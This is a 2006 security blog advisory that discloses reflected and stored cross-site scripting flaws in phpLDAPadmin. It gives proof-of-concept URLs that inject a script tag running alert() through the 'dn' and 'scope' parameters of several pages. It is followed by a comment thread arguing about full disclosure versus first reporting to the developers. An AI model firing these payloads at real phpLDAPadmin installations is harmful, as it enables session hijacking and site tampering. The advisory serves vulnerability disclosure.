by r0t,der4444,cembo,VietMafia

Friday, April 21, 2006

phpLDAPadmin multiple vuln.

phpLDAPadmin vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 april 2006
vendorlink:http://phpldapadmin.sourceforge.net/
affected versions:phpLDAPadmin 0.9.8 and prior
###############################################

Vuln. Description:

phpLDAPadmin contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "dn" paremeter in "compare_form.php",
"copy_form.php","rename_form.php","template_engine.php",
"delete_form.php" isn't properly sanitised before being returned to the user.
And input passed to "scope" parameter in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/compare_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/copy_form.php?server_id=0&dn=%22%3Cscript%3E
alert('r0t')%3C/script%3E

/rename_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/template_engine.php?server_id=0&dn=%22%3Cs
cript%3Ealert('r0t')%3C/script%3E

/delete_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/search.php?server_id=0&search=true&filter=
objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3D
example%2Cdc%3Dcom&form=advanced&scope=%22%
3Cscript%3Ealert('r0t')%3C/script%3E


And there also script insertion vuln. or html injection:

Like i say , take in example "/template_engine.php" and let input in
Container DN : [XSS]
Machine Name: [XSS]
UID Number: [XSS]
Those fields isn't sanitised before being stored in the vuln. system. This can be exploited to execute arbitrary script code in a user's browser session in context of an affected website when a malicious system entry is viewed.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

11 Comments:

Anonymous Anonymous told...

Did you follow the generally accepted procedure for reporting this vulnerability? Ie, did you contact the lead developer to provide details and wait for him/her to release a fixed version?

3:50 AM

 
Blogger r0t told...

1."generally accepted procedure" ???


"did you contact the lead developer to provide details and wait for him/her to release a fixed version"


1. me dont accept general procedures at all.

2.Read FAQ.
We dont provide any developers private. All of those blog reports are for open minds*...
We report about unsecured systems on net... ,if you are unsure for your work , you can give to guys to research/audit for free(more info on board)

PS.rss feeds isnt bad...

9:00 AM

 
Anonymous Anonymous told...

Wow. You are doing nothing good for the open source community. Congratulations. You are a leech.

7:41 PM

 
Blogger r0t told...

"open source community" - you mean that you are Open source lead developer?
Who cares, i do my stuff , you do your stuff... I have a big respect to every developer and i think that you guys are good , but as i told you do your hob i do my.
Good or bad...? who says?
Do you know meaning of word "leech"?

10:35 PM

 
Anonymous Anonymous told...

If you respect developers, you ought to show it be trying to help them. You are doing a disservice to developers by publically releasing vulnerabilities before the developers have a chance to release a fix. If you really respected open source developers, you would privately inform them of the vulnerability first, then given them time to issue a security fix release, and then publically release the details of the vulnerability.

What you are currently doing is causing lots of users pain by basically informing black hat crackers about vulnerabilities before there is even a fix available.

2:40 AM

 
Anonymous Anonymous told...

Fix your process. People are complaining.

http://article.gmane.org/gmane.comp.ldap.davedap/2981

4:56 PM

 
Blogger r0t told...

Intresting point "black hat crackers" is there also "white&grey hat crackers" :) ?
I only knew till not that some people give "hats" with colours to "hackers" ...
As i know cracker is cracker ....
ok. lets look about reporting and developer fix waiting.
Do you think that i show unrespect cauz i do not contact developer?
No,i dont lose my respect without having private contact to developers ...Does all respect is in contacts?
I know that some of my reports can be painfull to some users, but look at most bugtraq published advisorys or vuln. reports they are not less painfull for software users.
It nothin personal , its just a way how i express myself..

11:01 PM

 
Anonymous Anonymous told...

I couldn't parse your last comment. Please correct your English syntax errors.

Here's how it should work:

1. Report to developers in private.
2. Wait for them to release a fix.
3. Report to public.

The Result: Happy users. Happy developers. Sad crackers.

If you report to the public first, the result is: Mad users, mad developers, happy crackers.

Can you see my point yet?

P.S. I can't believe I'm wasting these keystrokes on an ignorant, arrogant, self-serving prepubescent script kiddie who has clearly never even heard the terms white hat or black hat.

5:39 PM

 
Anonymous Anonymous told...

The point is that you should notice the developers of the vulnerability, even if you publish your report at the same time.

Otherwise, the users of the application need to inform the developers which is really bad. The bugs can be fixed much faster if the developers know of the bug.

2:10 AM

 
Blogger r0t told...

Yes i see your point very clear.
Yes and sorry for my english.

But you again have more mistakes on your terms than in your grammar...greammar is almost perfect but your terms...

"I can't believe I'm wasting these keystrokes on an ignorant, arrogant, self-serving prepubescent script kiddie who has clearly never even heard the terms white hat or black hat."

As I say , i dint hear never about black&white hat "crackers"..about hackers i heard... i think there must be diference...

Loook you are one of those3 developers who think and belive that he is white hat hacker ..do you think ist isnt childish?

And can you say me , how can some person be a "script-kidie" if is in some point better than developer who thinks that he is "white hat hacker"?

Can you also show in wich point that script-kidie have showed his araogance? I know where is ignorance in his work , but arrogance?

And do you think that any person who will not folow those rulles that youfolow or you like that peoiple folow them.. taht person will be less inteligent?
Look if somebody will show you, your mistakes.. in anyway he cant be less inteligent as you in that point.

and do you think that if i chose to help crackers and not developers first, than i will be more arrogant,ignorant and more script-kidie,etc , as i will chose to be a "good boy" and help developers first ?

Even im too young , i can maybe understood some points better than you .. so , please try to be more objective to others and yourself.

and you must understand that knowlegde isnt black or white...

12:34 PM

 
Anonymous Anonymous told...

I'm starting to wonder if this is just a Turing-test bot.

4:39 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew